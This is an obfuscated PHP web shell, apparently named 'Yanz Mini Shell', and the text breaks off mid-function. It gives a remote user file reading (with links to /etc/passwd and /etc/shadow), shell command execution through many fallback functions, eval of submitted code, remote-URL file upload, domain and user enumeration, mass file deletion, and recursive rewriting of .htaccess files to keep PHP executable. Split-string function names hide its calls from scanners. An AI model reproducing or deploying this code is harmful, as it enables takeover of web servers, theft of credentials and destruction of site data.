0\x20\x3c\150\162\x3e\xa\x20\40\40\40\133\52\x5d\x20\x3c\x61\x20\x68\162\145\146\x3d\42\77\146\151\x6c\x65\x3d\x2f\x65\164\x63\57\160\x61\x73\x73\x77\144\42\76\57\145\164\143\57\x70\x61\163\x73\167\144\x3c\57\x61\76\xa\40\40\40\x20\x3c\x62\x72\x3e\xa\x20\x20\x20\40\x5b\52\135\x20\74\141\x20\150\x72\145\x66\x3d\42\x3f\146\151\154\x65\x3d\57\x65\164\143\x2f\x73\x68\141\144\x6f\x77\42\x3e\57\x65\164\x63\x2f\163\150\x61\144\x6f\167\74\57\x61\x3e\xa\40\x20\40\x20\74\x62\162\76\xa\x20\40\40\40\133\52\135\x20\x3c\x61\40\150\x72\x65\146\x3d\x22\x3f\x66\x69\154\x65\75\x2f\145\x74\143\x2f\x72\145\163\157\154\x76\x2e\143\157\156\x66\x22\x3e\57\x65\x74\x63\57\162\x65\x73\157\x6c\x76\x2e\143\x6f\156\x66\74\57\x61\x3e\xa\40\40\74\57\x64\151\166\x3e\xa\x20\x20\74\x64\151\166\40\x63\154\x61\163\x73\x3d\42\x72\61\42\76\12\x20\x20\x20\40\x20\x20"; goto SSAWa; a5yz4: echo "\74\154\x69\x6e\153\40\x72\145\x6c\x3d\42\x69\x63\x6f\156\42\40\150\x72\x65\146\x3d\x22\150\x74\x74\x70\163\x3a\x2f\x2f\x65\56\164\x6f\x70\x34\164\x6f\160\56\151\x6f\57\x70\137\x32\x36\71\x37\63\x6f\x63\71\151\61\56\x70\x6e\147\42\x3e\12\74\163\x74\x79\154\x65\x3e\xa\40\40\x68\x74\x6d\154\173\12\40\40\x20\x20\157\166\145\162\146\154\x6f\167\72\40\141\x75\164\157\73\12\40\x20\x20\x20\142\141\x63\153\147\x72\x6f\x75\x6e\x64\72\40\x62\x6c\x61\x63\x6b\x3b\12\x20\40\x20\x20\x63\x6f\x6c\x6f\x72\x3a\40\167\150\x69\x74\x65\73\xa\x20\40\x20\40\x66\x6f\156\164\x2d\146\x61\x6d\151\154\x79\72\x20\x22\x43\157\x75\x72\x69\145\x72\x20\x4e\145\x77\42\x3b\xa\40\x20\175\xa\40\40\x61\x20\173\xa\x20\x20\40\x20\x74\145\170\164\55\x64\x65\143\157\162\x61\x74\x69\157\156\72\x20\156\157\156\x65\73\xa\x20\x20\x20\40\143\x6f\x6c\157\x72\x3a\40\x77\150\151\x74\x65\73\xa\x20\x20\175\xa\40\x20\x2e\141\55\142\x61\x72\40\173\xa\40\40\x20\x20\164\145\170\x74\55\144\x65\x63\x6f\x72\x61\164\x69\x6f\x6e\72\x20\x6e\157\156\x65\x3b\12\x20\x20\40\40\x63\x6f\x6c\x6f\x72\x3a\40\x62\x6c\x61\143\153\73\xa\40\x20\175\12\x20\40\56\x62\x61\162\x20\x7b\xa\x20\40\x20\40\144\151\163\160\x6c\141\171\x3a\x20\151\x6e\x6c\x69\x6e\x65\73\xa\x20\40\x20\40\x70\141\144\144\x69\x6e\x67\x3a\x20\x35\160\x78\x3b\xa\x20\x20\40\x20\142\x61\x63\x6b\x67\x72\157\165\x6e\144\72\x20\x77\x68\151\x74\x65\x3b\12\40\40\x20\40\143\157\154\x6f\162\x3a\40\142\154\141\143\153\x3b\xa\40\x20\x7d\xa\x20\x20\x2e\x62\x61\x72\141\x74\141\x73\x20\173\xa\x20\x20\x20\x20\157\x76\x65\x72\x66\154\157\167\72\x20\x61\165\x74\x6f\73\xa\40\x20\40\40\x62\157\162\144\145\x72\72\x20\x31\160\x78\40\x73\157\154\x69\x64\x20\167\150\x69\164\x65\73\xa\40\x20\x20\40\160\x61\144\x64\151\156\147\x3a\40\x31\60\x70\x78\73\12\x20\x20\x20\40\142\141\x63\153\x67\x72\157\165\156\144\x3a\40\167\150\x69\x74\145\x3b\12\x20\x20\x20\x20\x63\x6f\x6c\157\x72\72\40\142\x6c\x61\143\x6b\x3b\12\x20\x20\175\12\40\40\x2e\143\154\157\x73\145\40\173\xa\40\40\40\x20\x6f\166\x65\x72\x66\154\157\167\72\x20\x61\x75\164\157\x3b\xa\x20\40\x20\40\142\x6f\162\x64\x65\162\x3a\x20\61\x70\x78\x20\x73\x6f\x6c\151\x64\x20\x72\x65\144\x3b\xa\x20\x20\40\40\x62\x61\x63\153\147\162\157\165\x6e\x64\x3a\x20\162\145\144\73\xa\x20\40\x20\x20\143\157\x6c\157\x72\x3a\x20\167\150\151\x74\145\x3b\12\40\40\x7d\12\40\x20\x2e\153\x6f\x74\x61\153\x20\x7b\12\x20\x20\40\40\157\166\145\x72\146\154\157\167\72\40\x61\x75\x74\157\73\xa\x20\x20\40\40\x62\157\162\x64\145\x72\x3a\40\61\160\x78\x20\x73\157\154\x69\144\x20\x77\x68\151\x74\x65\73\xa\40\40\40\x20\160\x61\x64\144\151\x6e\147\72\40\61\x30\160\170\x3b\xa\40\40\40\40\x63\157\154\157\x72\72\40\167\x68\x69\x74\x65\x3b\xa\x20\40\175\xa\x20\40\56\x6c\x20\x7b\xa\40\x20\x20\x20\146\154\157\x61\x74\72\40\x6c\145\146\164\x3b\xa\x20\x20\40\x20\x77\151\144\x74\150\x3a\40\x35\60\45\73\12\40\40\175\12\40\x20\56\162\x20\173\xa\x20\40\x20\40\146\154\x6f\x61\x74\72\x20\162\151\x67\x68\x74\x3b\12\40\40\x20\x20\167\151\144\164\x68\x3a\x20\x35\x30\x25\x3b\xa\40\40\x20\40\x74\x65\170\x74\55\141\154\151\147\x6e\x3a\x20\162\151\x67\x68\x74\73\12\40\x20\x7d\xa\40\x20\x2e\154\x31\40\x7b\xa\x20\x20\40\40\146\x6c\x6f\141\164\x3a\x20\x6c\x65\x66\164\73\12\40\40\x20\40\167\151\144\x74\x68\x3a\40\62\60\x25\73\xa\40\40\40\40\142\157\162\x64\145\162\72\40\x31\x70\x78\40\x73\x6f\154\151\144\40\x77\x68\151\x74\x65\x3b\12\40\x20\40\40\160\x61\144\144\151\156\x67\x3a\x20\61\60\160\170\73\xa\40\x20\175\xa\x20\x20\x2e\162\x31\x20\x7b\xa\x20\x20\40\x20\146\x6c\157\x61\x74\72\x20\162\x69\147\x68\x74\x3b\12\x20\40\x20\40\167\151\144\x74\x68\72\40\x37\65\x25\x3b\xa\40\x20\40\40\x62\x6f\x72\x64\x65\162\72\x20\61\x70\170\40\163\x6f\154\151\144\x20\x77\150\x69\x74\145\x3b\xa\x20\40\40\40\160\141\144\144\x69\x6e\x67\x3a\x20\x31\x30\x70\170\x3b\12\x20\40\175\xa\40\40\151\x6e\160\x75\x74\x20\x7b\xa\40\x20\40\40\x62\x61\143\x6b\147\x72\x6f\165\x6e\144\72\40\x77\150\151\164\145\x3b\xa\40\40\40\40\x63\157\154\x6f\162\x3a\x20\142\x6c\141\x63\153\x3b\xa\40\40\x20\x20\x62\x6f\x72\x64\145\x72\72\x20\x31\x70\170\40\163\157\154\x69\x64\40\x77\x68\x69\x74\145\x3b\xa\x20\x20\x20\x20\160\x61\144\x64\151\x6e\147\72\40\x35\160\x78\73\xa\x20\x20\175\12\x20\40\x2e\x66\x69\154\x65\40\173\12\40\40\40\x20\x77\151\144\164\150\72\x20\61\60\60\45\x3b\xa\40\x20\40\40\x68\x65\x69\147\x68\x74\x3a\40\65\x30\x25\x3b\xa\40\x20\175\12\x3c\x2f\163\164\x79\154\145\x3e\12\74\x64\151\x76\40\x63\154\141\163\163\75\42\x62\141\x72\141\164\x61\x73\x22\76\12\x20\40\x3c\144\151\x76\40\x63\154\141\x73\163\75\42\x6c\42\x3e\12\x20\x20\x20\x20\x59\x61\x6e\x7a\x20\x4d\151\156\151\x20\123\x68\x65\x6c\x6c\xa\40\x20\74\x2f\x64\151\x76\76\12\40\x20\x3c\144\151\x76\40\143\154\x61\x73\163\75\x22\162\42\x3e\12\x20\40\40\x20\40\x20\x3c\x61\40\143\154\x61\x73\x73\x3d\x22\x61\55\x62\141\162\42\40\x68\162\145\x66\x3d\42\x3f\160\141\147\145\75\142\x6c\141\156\x6b\42\76\x5b\137\135\x3c\57\141\x3e\xa\x20\40\40\40\x20\40\x3c\141\40\x63\154\x61\163\x73\75\x22\x61\55\x62\x61\x72\x22\x20\x68\x72\145\146\75\x22\x3f\160\x61\x67\145\x3d\x62\154\141\x6e\153\42\x3e\133\x2d\x5d\74\57\141\x3e\12\x20\40\x20\40\x20\x20\74\x61\40\x63\x6c\141\x73\x73\75\x22\x63\154\x6f\163\x65\42\40\150\x72\145\x66\75\42\x3f\42\76\133\x58\x5d\74\x2f\141\76\12\40\x20\74\x2f\x64\151\166\x3e\12\x3c\x2f\144\151\166\x3e\12\74\144\151\166\x20\143\x6c\x61\x73\x73\x3d\42\153\157\x74\141\153\x22\x3e\12\x20\x20\133\x20\74\x61\x20\x68\x72\x65\146\75\x22\x3f\x79\x6e\x7a\x6d\151\156\151\75"; goto ODT3T; EGBMG: echo "\74\x66\x6f\162\155\x20\x65\x6e\x63\x74\x79\160\145\x3d\x27\155\165\154\x74\151\x70\x61\x72\164\x2f\146\157\162\155\55\x64\x61\x74\x61\x27\40\x6d\145\x74\150\x6f\x64\75\x27\x70\x6f\x73\164\47\76\xa\40\x20\40\40\40\40\x20\x20\122\x65\x6e\x61\x6d\145\40\x54\x68\151\163\x20\106\157\x6c\144\145\x72\x20\x3a\x20\74\x69\156\x70\165\164\x20\x74\171\x70\145\x3d\47\x74\145\170\x74\47\40\x6e\x61\x6d\x65\x3d\47\x72\x65\156\x61\x6d\145\137\146\157\x6c\x64\x65\x72\x27\x3e\x3c\151\156\160\x75\x74\x20\164\x79\x70\145\75\47\x73\x75\142\x6d\x69\x74\47\x20\166\141\154\165\145\x3d\x27\x52\145\156\x61\155\x65\x27\x3e\12\x20\x20\x20\x20\40\x20\x20\40\x3c\x61\x20\x63\154\x61\x73\x73\75\x27\142\141\162\141\164\141\163\x27\x20\x68\162\x65\146\75\47\77\x72\x6d\x66\157\x6c\x64\x65\162\75{$IpbLa}\x27\x3e\x52\145\x6d\157\166\145\x20\124\150\x69\x73\x20\106\157\x6c\x64\145\x72\x3c\57\141\76\xa\40\40\40\40\40\40\x20\x20\x3c\x2f\x66\x6f\162\x6d\x3e\xa\40\40\40\x20\40\40\x20\x20\74\x68\162\76\12\40\40\x20\40\x20\x20\40\40"; goto sgmH6; T684K: eval($_SESSION["\143\157\x64\145"]); goto a1vT5; TTkuc: echo "\x3c\x66\x6f\x72\x6d\x20\x65\x6e\x63\164\171\x70\x65\x3d\47\155\x75\x6c\164\151\160\x61\x72\x74\57\146\x6f\x72\x6d\55\x64\141\x74\141\47\x20\155\x65\164\x68\x6f\144\75\47\x70\157\x73\164\x27\x3e\12\40\x20\x20\40\x20\x20\x20\x20\40\40\x3c\x74\x65\x78\x74\141\x72\x65\141\x20\x63\154\x61\163\x73\x3d\47\x66\x69\154\145\47\40\156\x61\x6d\145\x3d\x27\x65\x64\x69\164\137\146\x69\x6c\x65\47\76" . htmlspecialchars(file_get_contents($_GET["\146\x69\x6c\145"])) . "\74\57\164\x65\170\164\x61\162\x65\141\76\xa\x20\x20\x20\40\x20\40\40\x20\x20\40\74\142\x72\x3e\74\x62\162\76\xa\x20\40\x20\40\40\40\x20\40\x20\x20\74\x69\x6e\x70\x75\164\40\164\171\160\145\75\47\x73\165\142\155\x69\x74\x27\x20\x76\x61\154\x75\x65\x3d\x27\x53\141\166\x65\40\x46\x69\x6c\145\47\x3e\xa\40\x20\40\40\40\40\40\x20\x20\40\74\57\x66\x6f\162\x6d\76\12\x20\x20\40\40\40\40\x20\x20\40\x20"; goto qZgfY; o5XnE: vQPUY: goto Hb7f4; DTrTz: echo "\131\x61\x6e\172\x40{$imQ_V}\72\x7e\40\44\x20" . $_POST["\163\150\145\x6c\x6c"]; goto HtQ91; KbXXF: echo "\133\x2d\135\x20\x46\141\151\154\x65\144\40\x3a\40" . $_FILES["\165\160"]["\x6e\141\x6d\x65"]; goto fzcmM; UWFHE: VZEb1: goto Dqxca; OUauJ: echo "\46\145\x64\x69\164\75\164\162\165\x65\42\x3e\x45\x64\x69\x74\x3c\57\141\x3e\40\x5d\12\x5b\x20\74\141\x20\150\x72\x65\x66\x3d\42\x3f\x66\151\x6c\x65\75"; goto PAWWk; Fhr7E: frX5K: goto IFKLz; iqnbj: echo "\74\164\151\164\x6c\x65\x3e\x59\x61\156\172\x20\155\151\x6e\151\40\x53\150\x65\x6c\154\74\x2f\x74\151\x74\x6c\145\x3e\12"; goto uQfyX; rI1sO: echo "\40\x20\74\x2f\x64\151\166\x3e\xa\74\x2f\144\x69\x76\x3e\xa\x3c\144\151\166\x20\143\154\x61\x73\x73\x3d\42\153\157\164\141\x6b\x22\76\12\x20\x20\74\x64\151\x76\40\x63\x6c\141\163\163\75\42\154\42\76\12\40\40\x20\x20\106\162\x65\145\x20\x53\x70\141\x63\145\x20\72\40"; goto sts1l; RL6rR: $_SESSION["\x63\x6f\144\145"] = "\x3f\76" . $_POST["\x63\x6f\x64\x65"]; goto Qe5sr; SSAWa: if (!$_GET["\x66\x69\154\x65"]) { goto hGvRz; } goto XxuiP; dNB8T: if (fwrite($MAIiK, $_POST["\x69\163\151\x5f\x66\x69\x6c\145"])) { goto iPDSP; } goto INtVq; INtVq: echo "\x3c\163\143\162\151\160\164\76\x61\x6c\x65\x72\164\50\x27\103\162\x65\x61\164\145\144\x20\106\x69\x6c\x65\x20\106\x61\x69\x6c\x65\144\x20\x21\x21\41\47\51\73\40\x77\151\x6e\144\x6f\x77\56\x6c\157\143\x61\164\151\157\x6e\x20\75\x20\x27\x3f\47\73\x3c\x2f\x73\x63\x72\151\160\x74\x3e"; goto TfllX; YFF_y: echo "\74\x73\x63\162\x69\x70\164\76\x61\x6c\145\x72\164\50\x27\x46\151\x6c\145\x20\x52\145\x6e\141\x6d\145\x64\40\41\x21\x21\47\x29\x3b\40\167\x69\156\144\x6f\x77\56\x6c\157\143\x61\164\151\157\156\40\x3d\x20\47\x3f\x27\x3b\74\57\x73\143\x72\x69\x70\164\x3e"; goto h6s2T; Dqxca: $Co0jn = "\x3c\x3f\160\150\160\40\145\143\150\157\x20\x27\110\x65\154\154\x6f\x20\127\x6f\162\x6c\144\x27\73\40\x3f\76"; goto SOpYr; R51wP: zChWX: goto KoGzd; eGjKb: $IpbLa = $_SESSION["\144\x69\162"]; goto xzk8N; RpX1u: echo "\x20\102\171\x74\x65\xa\40\40\x3c\57\x64\x69\166\x3e\xa\x20\40\74\144\151\x76\x20\x63\x6c\141\x73\163\75\x22\x72\x22\x3e\12\40\40\74\x2f\144\x69\x76\76\12\74\57\x64\151\166\x3e\xa"; exit();} //MINISHELLINCLUDEANITISPASIPOSTBLOCKED else { echo "<html>"; echo "<link rel='icon' href='https://e.top4top.io/p_26973oc9i1.png' sizes='20x20' type='image/png'>"; $CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's'; $aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . ''; $OVpGNqqFZs = 'e' . 'v' . 'al'; $psDEwGhsxg = 'gz' . 'inf' . 'late'; $allowed_upload_extensions = ''; $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); $root_path = @GeTcwd(); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); define('FM_PATH', $p); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); if(isset($_POST['type']) && $_POST['type'] == "upload" && !empty($_REQUEST["uploadurl"])) { $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } function event_callback ($message) { global $callback; echo json_encode($message); } function get_file_path () { global $path, $fileinfo, $temp_file; return $path."/".basename($fileinfo->name); } $url = !empty($_REQUEST["uploadurl"]) && preg_match("|^http(s)?://.+$|", stripslashes($_REQUEST["uploadurl"])) ? stripslashes($_REQUEST["uploadurl"]) : null; //prevent 127.* domain and known ports $domain = parse_url($url, PHP_URL_HOST); $port = parse_url($url, PHP_URL_PORT); $knownPorts = [22, 23, 25, 3306]; if (preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i", $domain) || in_array($port, $knownPorts)) { $err = array("message" => "URL is not allowed"); event_callback(array("Failed Upload!" => $err)); messages(); } $use_curl = false; $temp_file = tempnam(sys_get_temp_dir(), "upload-"); $fileinfo = new stdClass(); $fileinfo->name = trim(urldecode(basename($url)), ".\x00..\x20"); $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false; $ext = strtolower(pathinfo($fileinfo->name, PATHINFO_EXTENSION)); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; $err = false; if(!$isFileAllowed) { $err = array("message" => "File extension is not allowed"); event_callback(array("Failed Upload!" => $err)); messages(); } if (!$url) { $success = false; } else if ($use_curl) { @$fp = fopen($temp_file, "w"); @$ch = curl_init($url); curl_setopt($ch, CURLOPT_NOPROGRESS, false ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_FILE, $fp); @$success = curl_exec($ch); $curl_info = curl_getinfo($ch); if (!$success) { $err = array("message" => curl_error($ch)); } @curl_close($ch); fclose($fp); $fileinfo->size = $curl_info["size_download"]; $fileinfo->type = $curl_info["content_type"]; } else { $ctx = stream_context_create(); @$success = copy($url, $temp_file, $ctx); if (!$success) { $err = error_get_last(); } } if ($success) { $success = rename($temp_file, strtok(get_file_path(), '?')); } if ($success) { event_callback(array("Done Uploaded In Home Directory Shell ! at Directory =[".$root_path."]" => $fileinfo)); messages(); } else { unlink($temp_file); if (!$err) { $err = array("message" => "Invalid url parameter"); } event_callback(array("Failed Upload!" => $err)); messages(); } } if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '')) { function vcnvSCZgBz($data) { if (empty($data)) return; $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; $ac = 0; $enc = ''; $tmp_arr = array(); if (!$data) { return $data; } do { $o1 = $aztJtafUXm($data, $i++); $o2 = $aztJtafUXm($data, $i++); $o3 = $aztJtafUXm($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 0x3f; $h2 = $bits >> 12 & 0x3f; $h3 = $bits >> 6 & 0x3f; $h4 = $bits & 0x3f; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); $enc = implode($tmp_arr, ''); $r = (strlen($data) % 3); return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3)); } function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } function charAt($data, $char) { return substr($data, $char, 1); } } else { function vcnvSCZgBz($s) { $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''; return $b($s); } } if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '')) { function zRtSHsbTzV($input) { if (empty($input)) return; $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; } } else { function zRtSHsbTzV($s) { $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''; return $b($s); } } function __ZW5jb2Rlcg($s) { return vcnvSCZgBz($s); } function __ZGVjb2Rlcg($s) { return zRtSHsbTzV($s); } function alfaEx($in,$re=false,$cgi=true,$all=false){ $data = _alfa_php_cmd($in,$re); if(empty($data)&&$cgi||$all){ if($GLOBALS['sys']=='unix'){ if(strlen(_alfa_php_cmd("whoami"))==0||$all){ $cmd = _alfa_cgicmd($in); if(!empty($cmd)){ return $cmd; } } } } return $data; } function _alfa_php_cmd($in,$re=false){ $out=''; try{ if($re)$in=$in." 2>&1"; if(function_exists('exec')){ @exec($in,$out); $out = @join("\n",$out); }elseif(function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }elseif(function_exists('system')){ ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); }elseif(function_exists("popen")&&function_exists("pclose")){ if(is_resource($f = @popen($in,"r"))){ $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } }elseif(function_exists('proc_open')){ $pipes = array(); $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null); $out=@stream_get_contents($pipes[1]); }elseif(class_exists('COM')){ $alfaWs = new COM('WScript.shell'); $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']); $stdout = $exec->StdOut(); $out=$stdout->ReadAll(); } }catch(Exception $e){} return $out; } function alfaGetCwd(){ if(function_exists("getcwd")){ return @getcwd(); }else{ return dirname($_SERVER["SCRIPT_FILENAME"]); } } function _alfa_file_exists($file,$cgi=true){ if(@file_exists($file)){ return true; }else{ if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){ return true; } } return false; } function alfaMakePwd(){ if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){ return "/home/{user}/public_html/"; } $document = explode("/", $_SERVER["DOCUMENT_ROOT"]); $public = end($document); array_pop($document); array_pop($document); $path = implode("/", $document) . "/{user}/" . $public; return $path; } function _alfa_file($file,$cgi=true){ $array = @file($file); if(!$array){ if(strlen(alfaEx("id",false,$cgi))>0){ $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi); if(strlen($data)>0){ return explode("\n", $data); }else{ return false; } }else{ return false; } }else{ return $array; } } function alfaGetDomains($state = false){ $state = "named.conf"; $lines = array(); $lines = _alfa_file('/etc/named.conf'); if(!$lines){ $lines = @scandir("/etc/valiases/"); $state = "valiases"; if(!$lines){ $lines = @scandir("/var/named"); $state = "named"; if(!$lines && $state){ $lines = _alfa_file('/etc/passwd'); $state = "passwd"; } } } return array("lines" => $lines, "state" => $state); } function _alfa_can_runCommand($cgi=true,$cache=true){ if(isset($_COOKIE["alfa_canruncmd"])&&$cache){ return true; } if(strlen(alfaEx("whoami",false,$cgi))>0){ $_COOKIE["alfa_canruncmd"] = true; return true; } return false; } function tes($memek){ echo($memek); } function execute ($dir) { echo($dir); echo '<br>'; echo 'Panggil Function All Dirs'; echo '<br>'; $content = '<IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$"> Order Allow,Deny Allow from all </FilesMatch>'; $md5content = md5($content); $dir = $dir; /*删除自己*/ $tempFile = md5($_SERVER["HTTP_HOST"].time()); file_put_contents($tempFile, "1"); /*如果缓存文件不存在那么不执行*/ if(file_exists($tempFile)){ $arrDirs = recurDirRW($dir); foreach($arrDirs as $path){ if(file_exists($path . "/" . $tempFile)){ echo $path.'adalah direktori root, hentikan eksekusi!<br>'; }else{ $htfile = $path . "/.htaccess"; chmod($htfile, 0777); file_put_contents($htfile, $content); chmod($htfile, 0444); $thecontent = file_get_contents($path."/.htaccess"); $theContentMd5 = md5($thecontent); if($theContentMd5 == $md5content){ echo $htfile.'FIXED HTACCESS selesai!<br>'; }else{ echo $htfile.'Fix HTAcces gagal!<br>'; } } } /*执行完,删除缓存文件*/ }else{ echo '根目录没有写权限!放弃执行!root dir is not writeable, abord!<br>'; } /** * 遍历目录,显示可读可写子目录 */ } function execute1 ($dir) { echo($dir); echo '<br>'; echo 'Panggil Function Not All Dirs'; echo '<br>'; $content = '<IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$"> Order Allow,Deny Allow from all </FilesMatch>'; $md5content = md5($content); $dir = $dir; /*删除自己*/ $tempFile = md5($_SERVER["HTTP_HOST"].time()); file_put_contents($tempFile, "1"); /*如果缓存文件不存在那么不执行*/ if(file_exists($tempFile)){ $arrDirs = recurDirRW1($dir); foreach($arrDirs as $path){ if(file_exists($path . "/" . $tempFile)){ echo $path.'adalah direktori root, hentikan eksekusi!<br>'; }else{ $htfile = $path . "/.htaccess"; chmod($htfile, 0777); file_put_contents($htfile, $content); chmod($htfile, 0444); $thecontent = file_get_contents($path."/.htaccess"); $theContentMd5 = md5($thecontent); if($theContentMd5 == $md5content){ echo $htfile.'FIXED HTACCESS selesai!<br>'; }else{ echo $htfile.'Fix HTAcces gagal!<br>'; } } } /*执行完,删除缓存文件*/ }else{ echo 'root dir is not writeable, abord!<br>'; } /** * 遍历目录,显示可读可写子目录 */ } function execute2 ($dir,$dirpub) { echo($dir.$dirpub); echo '<br>'; echo 'Panggil Function Not All Dirs'; echo '<br>'; $content = '<IfModule mod_rewrite.c> RewriteEngine On RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".*\.(?i:phtml|php|suspected|PHP)$"> Order Allow,Deny Allow from all </FilesMatch>'; $md5content = md5($content); $dir = $dir; /*删除自己*/ $tempFile = md5($_SERVER["HTTP_HOST"].time()); file_put_contents($tempFile, "1"); /*如果缓存文件不存在那么不执行*/ if(file_exists($tempFile)){ $arrDirs = recurDirRW1($dir); foreach($arrDirs as $path){ if(file_exists($path . "/" . $dirpub . $tempFile)){ echo $path.'adalah direktori root, hentikan eksekusi!<br>'; }else{ $htfile = $path . "/". $dirpub .".htaccess"; chmod($htfile, 0777); file_put_contents($htfile, $content); chmod($htfile, 0444); $thecontent = file_get_contents($path."/.htaccess"); $theContentMd5 = md5($thecontent); if($theContentMd5 == $md5content){ echo $htfile.'FIXED HTACCESS gagal!<br>'; }else{ echo $htfile.'Fix HTAcces selesai!<br>'; } } } /*执行完,删除缓存文件*/ }else{ echo 'root dir is not writeable, abord!<br>'; } /** * 遍历目录,显示可读可写子目录 */ } function recurDirRW($pathName) { //将结果保存在result变量中 $result = array(); $temp = array(); //判断传入的变量是否是目录 if(!is_dir($pathName) || !is_readable($pathName) || !is_writeable($pathName)) { return null; } //取出目录中的文件和子目录名,使用scandir函数 $allFiles = scandir($pathName); //遍历他们 foreach($allFiles as $fileName) { //判断是否是.和..因为这两个东西神马也不是。。。 if(in_array($fileName, array('.', '..'))) { continue; } //路径加文件名 $fullName = $pathName.'/'.$fileName; //如果是目录的话就继续遍历这个目录 if(is_dir($fullName) && is_readable($fullName) && is_writeable($fullName)) { //将这个目录中的文件信息存入到数组中 $result[] = $fullName; $temp = recurDirRW($fullName); $result = array_merge($result, $temp); } } return $result; } function recurDirRW1($pathName) { //将结果保存在result变量中 $result = array(); $temp = array(); //判断传入的变量是否是目录 if(!is_dir($pathName) || !is_readable($pathName) || !is_writeable($pathName)) { return null; } //取出目录中的文件和子目录名,使用scandir函数 $allFiles = scandir($pathName); //遍历他们 foreach($allFiles as $fileName) { //判断是否是.和..因为这两个东西神马也不是。。。 if(in_array($fileName, array('.', '..'))) { continue; } $fullName = $pathName.'/'.$fileName; if(is_dir($fullName) && is_readable($fullName) && is_writeable($fullName)){ $result[] = $fullName; } } return $result; } function hapus_massal($dir,$namafile){ if(is_writable($dir)){ $dira = scandir($dir); foreach($dira as $dirb){ $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.'){ if(file_exists("$dir/$namafile")){ chmod("$dir/$namafile", 0777); unlink("$dir/$namafile"); } }elseif($dirb === '..'){ if(file_exists("".dirname($dir)."/$namafile")){ chmod("".dirname($dir)."/$namafile", 0777); unlink("".dirname($dir)."/$namafile"); } }else{ if(is_dir($dirc)){ if(is_writable($dirc)){ if($lokasi){ echo "$lokasi > Terhapusn"; chmod($lokasi, 0777); unlink($lokasi); $massdel = hapus_massal($dirc,$namafile); } } } } } } } function color($bold = 1, $colorid = null, $string = null) { $color = array( "</font>", # 0 off "<font color='red'>", # 1 red "<font color='lime'>", # 2 lime "<font color='white'>", # 3 white "<font color='gold'>", # 4 gold ); return ($string !== null) ? $color[$colorid].$string.$color[0]: $color[$colorid]; } function path() { if(isset($_GET['dir'])) { $dir = str_replace("\\", "/", 